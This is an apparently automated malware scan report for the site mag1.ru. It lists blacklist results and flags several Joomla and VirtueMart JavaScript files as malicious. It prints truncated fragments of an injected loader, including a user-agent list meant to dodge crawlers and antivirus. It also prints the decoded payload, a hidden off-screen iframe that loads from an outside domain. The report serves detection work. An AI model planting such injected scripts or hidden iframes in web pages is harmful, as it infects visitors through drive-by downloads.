Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mag1.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mag1.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://mag1.ru/ | 200 OK Content-Length: 44211 Content-Type: text/html | clean |
http://mag1.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2 | 200 OK Content-Length: 28667 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros }}, subscribe: function(o,g){return this.ajax('JCommentsSubscribe',arguments);}, unsubscribe: function(o,g){return this.ajax('JCommentsUnsubscribe',arguments);}, updateSubscription: function(m,t){var e=this.$('comments-subscription');if(e){var jc=this;e.innerHTML=t;e.onclick=m?function(){jc.unsubscribe(jc.oi,jc.og);return false;}:function(){jc.subscribe(jc.oi,jc.og);return false;};e.blur();}}, go: function(l){window.open(l);return;} };; Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> Antivirus reports:
| ||
http://mag1.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 5466 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros switch(cmd) { case 'as': if(obj){eval("obj."+property+"=data;");} break; case 'al': if(data){alert(data);} break; case 'js': if(data){eval(data);} break; default: this.error('Unknown command: ' + cmd);break; } } delete result; delete cmd; delete id; delete property; delete data; delete obj; return true; }; this.error = function(){}; } var jtajax = new jtAJAX(); }; Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> Antivirus reports:
| ||
http://mag1.ru/media/system/js/caption.js | 200 OK Content-Length: 3451 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Fire ...[2589 bytes skipped]... Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> | ||
http://mag1.ru/templates/yoo_neo/warp/systems/joomla.1.5/js/warp.js | 200 OK Content-Length: 2640 Content-Type: application/javascript | clean |
http://mag1.ru/templates/yoo_neo/warp/systems/joomla.1.5/js/accordionmenu.js | 200 OK Content-Length: 1688 Content-Type: application/javascript | clean |
http://mag1.ru/templates/yoo_neo/warp/systems/joomla.1.5/js/menu.js | 200 OK Content-Length: 6270 Content-Type: application/javascript | clean |
http://mag1.ru/templates/yoo_neo/warp/systems/joomla.1.5/js/fancymenu.js | 200 OK Content-Length: 5749 Content-Type: application/javascript | clean |
http://mag1.ru/templates/yoo_neo/js/template.js | 200 OK Content-Length: 2919 Content-Type: application/javascript | clean |
http://mag1.ru/o-kompanii/kontakty.html | 200 OK Content-Length: 26280 Content-Type: text/html | clean |
http://mag1.ru/obratnaya-svyaz/obratnaya-svyaz.html | 200 OK Content-Length: 27161 Content-Type: text/html | clean |
http://mag1.ru/media/system/js/validate.js | 200 OK Content-Length: 5734 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros el.labelref = label; } }); } if (state == false) { el.addClass('invalid'); if (el.labelref) { $(el.labelref).addClass('invalid'); } } else { el.removeClass('invalid'); if (el.labelref) { $(el.labelref).removeClass('invalid'); } } } }); document.formvalidator = null; Window.onDomReady(function(){ document.formvalidator = new JFormValidator(); });; Decoded script: <iframe src=http://dazzlezoom.ru/h43u5jhtr.g32y4h?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe> Antivirus reports:
| ||
http://mag1.ru/magazin.html | 200 OK Content-Length: 30308 Content-Type: text/html | clean |
http://www.mag1.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/ja-zeolite&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js | 200 OK Content-Length: 62240 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros new Fx.Style(this.container, 'opacity', { duration:250, onComplete: function() { window.removeEvent('scroll', this.eventPosition).removeEvent('resize', this.eventPosition); if (this.options.overlay) { this.overlay.remove(); } try{ this.container.remove(); } catch(e){} }.bind(this) }).custom(1, 0); } }); MooPrompt.implement(new Chain);; Antivirus reports:
| ||
http://www.mag1.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/js&file[0]=wz_tooltip.js | 200 OK Content-Length: 39553 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function braborossa(){ var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'; denygros { var b = false; for(var i = tt_aExt.length; i;) {--i; var fnc = tt_aExt[i]["On" + sFnc]; if(fnc && fnc(arg)) b = true; } return b; } if (window.addEventListener) { window.addEventListener("load", tt_Init, false); } else if (window.attachEvent) { window.attachEvent("onload", tt_Init); } else if (document.getElementById) { window.onload=tt_Init; } ; Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mag1.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 10:42:28 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 20 Sep 2014 10:42:30 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0cb2334f4e754b87f7a5b797c5fd7889=gf8gvrprkd9fo3ppqth1q9a6i2; path=/
Set-Cookie: virtuemart=gf8gvrprkd9fo3ppqth1q9a6i2
Set-Cookie: virtuemart=gf8gvrprkd9fo3ppqth1q9a6i2
X-Powered-By: PHP/5.3.10-1~dotdeb.1
GET / HTTP/1.1
Host: mag1.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 20 Sep 2014 10:42:28 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 20 Sep 2014 10:42:30 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0cb2334f4e754b87f7a5b797c5fd7889=gf8gvrprkd9fo3ppqth1q9a6i2; path=/
Set-Cookie: virtuemart=gf8gvrprkd9fo3ppqth1q9a6i2
Set-Cookie: virtuemart=gf8gvrprkd9fo3ppqth1q9a6i2
X-Powered-By: PHP/5.3.10-1~dotdeb.1
Second query (visit from search engine):
GET / HTTP/1.1
Host: mag1.ru
Referer: http://www.google.com/search?q=mag1.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mag1.ru
Referer: http://www.google.com/search?q=mag1.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.